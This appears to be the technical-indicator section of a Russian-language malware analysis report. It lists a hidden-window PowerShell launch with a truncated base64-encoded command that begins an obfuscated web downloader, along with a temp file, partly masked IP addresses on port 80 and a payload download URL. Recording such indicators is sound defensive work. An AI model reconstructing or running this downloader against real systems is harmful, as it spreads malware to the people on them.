Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAHgAUQBRAEMAQQBrAEEAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAFEAJwAsACcAZgB4AGsAQQBBAFoAJwAsACcAQQAnACkAOwAkAFAAUQBBAEIAMQBVAEEAPQBOAGUAYABXAC0AYABvAEIASgBFAEMAVAAgACgAJwBOAGUAdAAnAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1171676.cvr
- '13#.#8.156.95':80
- '16#.#27.169.67':80
- '35.##3.167.184':80
- '35.##2.76.64':80
- '10#.#78.221.225':80
- http://13#.#8.156.95/cm0dtam/x_fo/
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAHgAUQBRAEMAQQBrAEEAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAFEAJwAsACcAZgB4AGsAQQBBAFoAJwAsACcAQQAnACkAOwAkAFAAUQBBAEIAMQBVAEEAPQBOAGUAYABXAC0AYABvAEIASgBFAEMAVAAgACgAJwBOAGUAdAAnAC...' (со скрытым окном)